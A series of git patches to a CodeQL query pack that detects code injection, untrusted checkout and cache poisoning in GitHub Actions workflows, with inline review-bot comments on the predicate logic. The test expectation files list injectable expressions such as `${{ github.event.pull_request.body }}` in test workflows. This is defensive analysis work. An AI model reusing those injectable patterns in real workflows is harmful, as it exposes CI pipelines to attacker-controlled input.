+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -234,6 +234,7 @@ nodes | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | semmle.label | toJSON(github.event.comment.body).foo | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 842b741611788964c82caad40ce785ff56305c3b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 31 May 2024 16:02:51 +0200 Subject: [PATCH 0311/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 2736e30331c..84f18e2b521 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.30 +version: 0.0.31 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 451b49ec07e..4a196108be6 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.30 +version: 0.0.31 groups: - actions - queries From 844b6e014bb6aef8c48ba86caba0ed3f34b95480 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 31 May 2024 19:04:32 +0200 Subject: [PATCH 0312/1267] Bump qlpack versions --- ql/lib/codeql/actions/ast/internal/Ast.qll | 10 +++++++--- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- .../CWE-829/UntrustedCheckoutCritical.expected | 2 -- .../Security/CWE-829/UntrustedCheckoutMedium.expected | 2 ++ 5 files changed, 11 insertions(+), 7 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 1094a152126..2b15061be3d 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -818,8 +818,9 @@ class JobImpl extends AstNodeImpl, TJobNode { } private predicate hasPrivilegedTrigger() { - // the Job is triggered by an event other than `pull_request` + // the Job is triggered by an event other than `pull_request`, `push`, or `workflow_call` count(this.getATriggerEvent()) = 1 and + not this.getATriggerEvent().getName() = "push" and not this.getATriggerEvent().getName() = "pull_request" and not this.getATriggerEvent().getName() = "workflow_call" or @@ -832,8 +833,11 @@ class JobImpl extends AstNodeImpl, TJobNode { not exists(this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller()) ) or - // the Workflow has multiple triggers so at least one is not "pull_request" - count(this.getATriggerEvent()) > 1 + // the Job is triggered by an event other than `push`, `pull_request`, or `workflow_call` + exists(string event | + this.getATriggerEvent().getName() = event and + not event = ["push", "pull_request", "workflow_call"] + ) } /** Gets the trigger event that starts this workflow. */ diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 84f18e2b521..9acfb3035a4 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.31 +version: 0.0.32 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 
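Review bot: In `hasPrivilegedTrigger()` the rewritten last disjunct, `exists(string event | this.getATriggerEvent().getName() = event and not event = ["push", "pull_request", "workflow_call"])`, already holds for any job whose single trigger is outside that list. The first disjunct (`count(this.getATriggerEvent()) = 1 and not ... "push" ...`) is therefore subsumed, and both branches now carry the same comment. Dropping the first branch, or rewording its comment, would make clear which case each one covers. Treating `push` as a non-privileged trigger also deserves a why-comment, since it appears to be what moves the dependabot1.yml results from the Critical to the Medium expectations in this commit. The middle of the predicate lies between the two hunks and is not visible here.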
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 4a196108be6..5637bef68a0 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.31 +version: 0.0.32 groups: - actions - queries diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 2660a726ab6..1f90c56607d 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,7 +1,5 @@ | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index e69de29bb2d..9adfa3cee7c 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected 
@@ -0,0 +1,2 @@ +| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 88465bd0e350b1da1ff468a96af6d04f85a86dab Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 3 Jun 2024 11:26:51 +0200 Subject: [PATCH 0313/1267] Improve privleged detection --- ql/lib/codeql/actions/Ast.qll | 12 +- ql/lib/codeql/actions/Helper.qll | 46 +--- ql/lib/codeql/actions/ast/internal/Ast.qll | 215 ++++++++++-------- ql/src/Security/CWE-349/CachePoisoning.ql | 2 +- .../CWE-349/CachePoisoningByCodeInjection.ql | 2 +- .../CWE-094/CodeInjectionCritical.expected | 1 - .../CWE-094/CodeInjectionMedium.expected | 1 + 7 files changed, 141 insertions(+), 138 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 9be2580f36e..e837c6fcb30 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -77,6 +77,8 @@ class CompositeAction extends AstNode instanceof CompositeActionImpl { LocalJob getACaller() { result = super.getACaller() } predicate isPrivileged() { super.isPrivileged() } + + predicate isPrivilegedExternallyTriggerable() { super.isPrivilegedExternallyTriggerable() } } /** @@ -169,6 +171,10 @@ class Event extends AstNode instanceof EventImpl { string getAPropertyValue(string prop) { result = super.getAPropertyValue(prop) } predicate hasProperty(string prop) { super.hasProperty(prop) } + + predicate isExternallyTriggerable() { super.isExternallyTriggerable() } + + predicate isPrivileged() { super.isPrivileged() } } /** 
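Review bot: The predicates added to the public `CompositeAction` and `Event` classes (`isPrivilegedExternallyTriggerable()`, `isExternallyTriggerable()`, `isPrivileged()`) have no QLDoc, and neither does `Job.isPrivilegedExternallyTriggerable()` in the next hunk of this file. Queries pick their severity from these, so each should state its contract, for example `/** Holds if this event can be triggered by an external actor. */` and `/** Holds if this action is privileged and has an externally triggerable caller. */`. Both class bodies start and end outside these hunks.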
@@ -198,11 +204,11 @@ abstract class Job extends AstNode instanceof JobImpl { Strategy getStrategy() { result = super.getStrategy() } + string getARunsOnLabel() { result = super.getARunsOnLabel() } + predicate isPrivileged() { super.isPrivileged() } - predicate isExternallyTriggerable() { super.isExternallyTriggerable() } - - string getARunsOnLabel() { result = super.getARunsOnLabel() } + predicate isPrivilegedExternallyTriggerable() { super.isPrivilegedExternallyTriggerable() } } class LocalJob extends Job instanceof LocalJobImpl { diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 563a9800214..401ba89eca7 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll 
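Review bot: Removing `isExternallyTriggerable()` from the public `Job` class breaks any query outside this patch that still calls it. The two CWE-349 queries are updated in this commit, but other callers are not visible here. A forwarding predicate kept for a release would avoid that, such as `deprecated predicate isExternallyTriggerable() { this.getATriggerEvent().isExternallyTriggerable() }`, assuming `getATriggerEvent()` is available on `Job`. The class body starts before this hunk.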
@@ -210,54 +210,28 @@ predicate writeToGitHubPath(Run run, string content) { predicate inPrivilegedCompositeAction(AstNode node) { exists(CompositeAction a | - // node is in a privileged composite action a = node.getEnclosingCompositeAction() and - ( - a.isPrivileged() - or - exists(Job caller | - caller = a.getACaller() and - caller.isPrivileged() and - caller.isExternallyTriggerable() - ) - ) - ) -} - -predicate inPrivilegedExternallyTriggerableJob(AstNode node) { - exists(Job j | - // node is in a privileged and externally triggereable job - j = node.getEnclosingJob() and - // job is privileged (write access or access to secrets) - j.isPrivileged() and - // job is triggereable by an external user - j.isExternallyTriggerable() + a.isPrivilegedExternallyTriggerable() ) } predicate inNonPrivilegedCompositeAction(AstNode node) { exists(CompositeAction a | - // node is in a non-privileged composite action a = node.getEnclosingCompositeAction() and - not a.isPrivileged() and - not exists(LocalJob caller | - caller = a.getACaller() and - caller.isPrivileged() and - caller.isExternallyTriggerable() - ) + not a.isPrivilegedExternallyTriggerable() + ) +} + +predicate inPrivilegedExternallyTriggerableJob(AstNode node) { + exists(Job j | + j = node.getEnclosingJob() and + j.isPrivilegedExternallyTriggerable() ) } predicate inNonPrivilegedJob(AstNode node) { exists(Job j | - // node is in a non-privileged or not externally triggereable job j = node.getEnclosingJob() and - ( - // job is non-privileged (no write access and no access to secrets) - not j.isPrivileged() - or - // job is triggereable by an external user - not j.isExternallyTriggerable() - ) + not j.isPrivilegedExternallyTriggerable() ) } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 2b15061be3d..e31edf7900a 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
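Review bot: `inPrivilegedCompositeAction` used to hold when `a.isPrivileged()` alone was true, but it now requires `a.isPrivilegedExternallyTriggerable()`, which in `CompositeActionImpl` needs a caller job with an externally triggerable event. A composite action that reads secrets but has no resolvable caller in the analysed repository therefore lands in `inNonPrivilegedCompositeAction` and is reported at the lower severity. That seems to be why the action3 result leaves CodeInjectionCritical.expected in this commit. If the downgrade is intended it should be stated in a comment on the predicate; otherwise keep the old first case with `a.isPrivileged() or a.isPrivilegedExternallyTriggerable()`. The explanatory comments this hunk removes from the four predicates would be worth keeping as QLDoc.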
@@ -317,18 +317,6 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { ) } - /** Holds if the action is privileged. */ - predicate isPrivileged() { - // there is a calling job that defines explicit write permissions - this.hasExplicitWritePermission() - or - // the actions has an explicit secret accesses - this.hasExplicitSecretAccess() - or - // there is a privileged caller job - this.getACaller().isPrivileged() - } - private predicate hasExplicitSecretAccess() { // the job accesses a secret other than GITHUB_TOKEN exists(SecretsExpressionImpl expr | @@ -340,6 +328,35 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { // a calling job has an explicit write permission this.getACaller().getPermissions().getAPermission().matches("%write") } + + /** Holds if the action is privileged. */ + predicate isPrivileged() { + // there is a calling job that defines explicit write permissions + this.hasExplicitWritePermission() + or + // the actions has an explicit secret accesses + this.hasExplicitSecretAccess() + or + // there is a privileged caller job + ( + this.getACaller().isPrivileged() + or + not this.getACaller().isPrivileged() and + this.getACaller().getATriggerEvent().isPrivileged() + ) + } + + /** Holds if the action is privileged and externally triggerable. */ + predicate isPrivilegedExternallyTriggerable() { + // the action is externally triggerable + exists(JobImpl caller, EventImpl event | + caller = this.getACaller() and + event = caller.getATriggerEvent() and + event.isExternallyTriggerable() and + // the action is privileged + (this.isPrivileged() or caller.isPrivileged()) + ) + } } class WorkflowImpl extends AstNodeImpl, TWorkflowNode { 
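Review bot: In the new `CompositeActionImpl.isPrivileged()`, `not this.getACaller().isPrivileged()` does not refer to the same caller as the following `this.getACaller().getATriggerEvent().isPrivileged()`. Each `getACaller()` is quantified separately, so the clause reads "no caller is privileged and some caller has a privileged trigger". Combined with the preceding disjunct this reduces to `this.getACaller().isPrivileged() or this.getACaller().getATriggerEvent().isPrivileged()`, which is simpler and says what is meant. If the intent was to inspect the trigger of one specific non-privileged caller, bind it with `exists(JobImpl caller | caller = this.getACaller() and ...)` as `isPrivilegedExternallyTriggerable()` does just below.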
@@ -688,6 +705,42 @@ class EventImpl extends AstNodeImpl, TEventNode { /** Holds if the event has a property with the given name */ predicate hasProperty(string prop) { exists(this.getAPropertyValue(prop)) } + + /** Holds if the event can be triggered by an external actor. */ + predicate isExternallyTriggerable() { + // the job is triggered by an event that can be triggered externally + externallyTriggerableEventsDataModel(this.getName()) + or + // the event is `workflow_call` and there is a caller workflow that can be triggered externally + this.getName() = "workflow_call" and + ( + // there are hints that this workflow is meant to be called by external triggers + exists(ExpressionImpl expr, string external_trigger | + expr.getEnclosingWorkflow() = this.getEnclosingWorkflow() and + expr.getExpression().matches("%github.event" + external_trigger + "%") and + externallyTriggerableEventsDataModel(external_trigger) + ) + or + this.getEnclosingWorkflow() + .(ReusableWorkflowImpl) + .getACaller() + .getATriggerEvent() + .isExternallyTriggerable() + ) + } + + predicate isPrivileged() { + // the Job is triggered by an event other than `pull_request`, or `workflow_call` + not this.getName() = "pull_request" and + not this.getName() = "workflow_call" + or + // Reusable Workflow with a privileged caller or we cant find a caller + this.getName() = "workflow_call" and + ( + this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isPrivileged() or + not exists(this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller()) + ) + } } class JobImpl extends AstNodeImpl, TJobNode { 
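Review bot: The `workflow_call` hint in `isExternallyTriggerable()` builds its pattern as `"%github.event" + external_trigger + "%"`, with no `.` after `github.event`. The same data-model predicate is applied to `this.getName()` a few lines above, so its values are bare event names and the pattern cannot match an expression such as `github.event.pull_request.title`. The check probably wants `"%github.event." + external_trigger + "%"`, though event names do not always equal the payload key, so the hint may need its own list. The hint now inspects every expression in the enclosing workflow rather than in one job, which widens it and merits a comment. `isPrivileged()` is the only predicate added here without QLDoc, and its inline comment still says "the Job".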
@@ -746,43 +799,39 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the strategy for this job. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } - /** Holds if the job can be triggered by an external actor. */ - predicate isExternallyTriggerable() { - // the job is triggered by an event that can be triggered externally - externallyTriggerableEventsDataModel(this.getATriggerEvent().getName()) - or - // the job is triggered by a workflow_call event that can be triggered externally - this.getATriggerEvent().getName() = "workflow_call" and - ( - exists(ExpressionImpl e, string external_trigger | - e.getEnclosingJob() = this and - e.getExpression().matches("%github.event" + external_trigger + "%") and - externallyTriggerableEventsDataModel(external_trigger) - ) - or - this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isExternallyTriggerable() - ) - } + /** Gets the trigger event that starts this workflow. */ + EventImpl getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } - /** Holds if the job is privileged. */ - predicate isPrivileged() { - // the job has privileged runtime permissions - this.hasRuntimeWritePermissions() - or - // the job has an explicit secret accesses - this.hasExplicitSecretAccess() - or - // the job has an explicit write permission - this.hasExplicitWritePermission() - or - // the job has no explicit permissions but the workflow has write permissions - not exists(this.getPermissions()) and - this.hasImplicitWritePermission() - or - // neither the job nor the workflow have permissions but the job has a privileged trigger - not exists(this.getPermissions()) and - not exists(this.getEnclosingWorkflow().getPermissions()) and - this.hasPrivilegedTrigger() + // private predicate hasSingleTrigger(string trigger) { + // this.getATriggerEvent().getName() = trigger and + // count(this.getATriggerEvent()) = 1 + // } + /** Gets the runs-on field of the job. 
*/ + string getARunsOnLabel() { + exists(ScalarValueImpl lbl, YamlMappingLikeNode runson | + runson = n.lookup("runs-on").(YamlMappingLikeNode) + | + ( + lbl.getNode() = runson.getNode(_) and + not lbl.getNode() = runson.getNode("group") + or + lbl.getNode() = runson.getNode("labels").(YamlMappingLikeNode).getNode(_) + ) and + ( + not exists(MatrixExpressionImpl e | e.getParentNode() = lbl) and + result = + lbl.getValue() + .trim() + .regexpReplaceAll("^('|\")", "") + .regexpReplaceAll("('|\")$", "") + .trim() + or + exists(MatrixExpressionImpl e | + e.getParentNode() = lbl and + result = e.getLiteralValues() + ) + ) + ) } private predicate hasExplicitSecretAccess() { 
@@ -817,60 +866,34 @@ class JobImpl extends AstNodeImpl, TJobNode { ) } - private predicate hasPrivilegedTrigger() { - // the Job is triggered by an event other than `pull_request`, `push`, or `workflow_call` - count(this.getATriggerEvent()) = 1 and - not this.getATriggerEvent().getName() = "push" and - not this.getATriggerEvent().getName() = "pull_request" and - not this.getATriggerEvent().getName() = "workflow_call" + /** Holds if the job is privileged. */ + predicate isPrivileged() { + // the job has privileged runtime permissions + this.hasRuntimeWritePermissions() or - // the Workflow is a Reusable Workflow only and there is - // a privileged caller workflow or we cant find a caller - count(this.getATriggerEvent()) = 1 and - this.getATriggerEvent().getName() = "workflow_call" and - ( - this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isPrivileged() or - not exists(this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller()) - ) + // the job has an explicit secret accesses + this.hasExplicitSecretAccess() or - // the Job is triggered by an event other than `push`, `pull_request`, or `workflow_call` - exists(string event | - this.getATriggerEvent().getName() = event and - not event = ["push", "pull_request", "workflow_call"] - ) + // the job has an explicit write permission + this.hasExplicitWritePermission() + or + // the job has no explicit permissions but the workflow has write permissions + not exists(this.getPermissions()) and + this.hasImplicitWritePermission() } - /** Gets the trigger event that starts this workflow. */ - EventImpl getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } - - // private predicate hasSingleTrigger(string trigger) { - // this.getATriggerEvent().getName() = trigger and - // count(this.getATriggerEvent()) = 1 - // } - /** Gets the runs-on field of the job. 
*/ - string getARunsOnLabel() { - exists(ScalarValueImpl lbl, YamlMappingLikeNode runson | - runson = n.lookup("runs-on").(YamlMappingLikeNode) - | + /** Holds if the action is privileged and externally triggerable. */ + predicate isPrivilegedExternallyTriggerable() { + exists(EventImpl e | + // job is triggereable by an external user + this.getATriggerEvent() = e and + e.isExternallyTriggerable() and + // job is privileged (write access or access to secrets) ( - lbl.getNode() = runson.getNode(_) and - not lbl.getNode() = runson.getNode("group") + this.isPrivileged() or - lbl.getNode() = runson.getNode("labels").(YamlMappingLikeNode).getNode(_) - ) and - ( - not exists(MatrixExpressionImpl e | e.getParentNode() = lbl) and - result = - lbl.getValue() - .trim() - .regexpReplaceAll("^('|\")", "") - .regexpReplaceAll("('|\")$", "") - .trim() - or - exists(MatrixExpressionImpl e | - e.getParentNode() = lbl and - result = e.getLiteralValues() - ) + not this.isPrivileged() and + e.isPrivileged() ) ) } diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 80ebd92c5d3..d81c13021c1 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -24,7 +24,7 @@ where // TODO: Consider adding artifact downloads as a potential source of cache poisoning j.getAStep() = checkout and // job can be triggered by an external user - j.isExternallyTriggerable() and + j.getATriggerEvent().isExternallyTriggerable() and ( // the job writes to the cache // (No need to follow the checkout step as the cache writing is normally done after the job completes) diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql index 1c13497ddaf..5ed3c966ad3 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql 
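Review bot: `JobImpl.isPrivileged()` no longer has a trigger-based case, and its replacement in `isPrivilegedExternallyTriggerable()` (`not this.isPrivileged() and e.isPrivileged()`) drops the old guard that neither the job nor the workflow declares `permissions`. A job with an explicit read-only `permissions` block and no secret access is therefore treated as privileged whenever one of its externally triggerable events is privileged. If that is intended, say so in the QLDoc; otherwise restore the guard with `not exists(this.getPermissions()) and not exists(this.getEnclosingWorkflow().getPermissions())`. The `not this.isPrivileged() and` part is redundant after the `or`, and the QLDoc on the predicate says "the action" where it means the job.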
@@ -22,7 +22,7 @@ where CodeInjectionFlow::flowPath(source, sink) and j = sink.getNode().asExpr().getEnclosingJob() and // job can be triggered by an external user - j.isExternallyTriggerable() and + j.getATriggerEvent().isExternallyTriggerable() and // excluding privileged workflows since they can be easily exploited in similar circumstances not j.isPrivileged() and // The workflow runs in the context of the default branch diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 48412116363..a65f85d0486 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
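Review bot: The `not j.isPrivileged()` filter below the changed line no longer excludes everything it did before, because this commit removes the trigger-based case from `JobImpl.isPrivileged()`. A job that is privileged only through its trigger event now passes the filter, so it may be reported here as well as by the critical code-injection query, if that query relies on `isPrivilegedExternallyTriggerable()`. Using `not j.isPrivilegedExternallyTriggerable()` would keep the exclusion aligned with the new definition. The `where` clause starts before and continues after this hunk.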
@@ -261,7 +261,6 @@ nodes subpaths #select | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index d577e2fd732..804c4f1df6c 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -260,6 +260,7 @@ nodes | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | subpaths #select +| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | From a5c6df3070810e34500a5986b275ee1559cca432 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 3 Jun 2024 18:13:01 +0200 Subject: [PATCH 0314/1267] Move from yaml to js extractor --- .!79690!.DS_Store | 0 ql/lib/codeql-pack.lock.yml | 22 +++-- .../codeql/actions/dataflow/ExternalFlow.qll | 18 ++--- .../internal/ExternalFlowExtensions.qll | 6 +- ql/lib/ext/8398a7_action-slack.model.yml | 2 +- ...rSource_sonarcloud-github-action.model.yml | 2 +- ql/lib/ext/actions_github-script.model.yml | 2 +- ...ahmadnassri_action-changed-files.model.yml | 2 +- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 4 +- ...nnn_action-semantic-pull-request.model.yml | 2 +- ql/lib/ext/anchore_sbom-action.model.yml | 2 +- ql/lib/ext/anchore_scan-action.model.yml | 2 +- .../ext/andresz1_size-limit-action.model.yml | 2 +- .../android-actions_setup-android.model.yml | 2 +- ...le-actions_import-codesign-certs.model.yml | 2 +- ql/lib/ext/asdf-vm_actions.model.yml | 2 +- ...taylor_read-json-property-action.model.yml | 2 +- ...ley-taylor_regex-property-action.model.yml | 2 +- .../aszc_change-string-case-action.model.yml | 2 +- ...ctions_configure-aws-credentials.model.yml | 2 +- .../axel-op_googlejavaformat-action.model.yml | 2 +- ql/lib/ext/azure_powershell.model.yml | 2 +- ql/lib/ext/bahmutov_npm-install.model.yml | 2 +- .../blackducksoftware_github-action.model.yml | 2 +- ql/lib/ext/bobheadxi_deployments.model.yml | 2 +- .../bufbuild_buf-breaking-action.model.yml | 4 +- ql/lib/ext/bufbuild_buf-lint-action.model.yml | 4 +- .../ext/bufbuild_buf-setup-action.model.yml | 2 +- ql/lib/ext/cachix_cachix-action.model.yml | 4 +- ql/lib/ext/changesets_action.model.yml | 2 +- .../ext/cloudflare_wrangler-action.model.yml | 2 +- ql/lib/ext/coursier_cache-action.model.yml | 2 +- .../crazy-max_ghaction-chocolatey.model.yml | 2 +- .../crazy-max_ghaction-import-gpg.model.yml | 2 +- .../csexton_release-asset-action.model.yml | 2 +- ...cycjimmy_semantic-release-action.model.yml | 2 +- ql/lib/ext/cypress-io_github-action.model.yml | 2 +- 
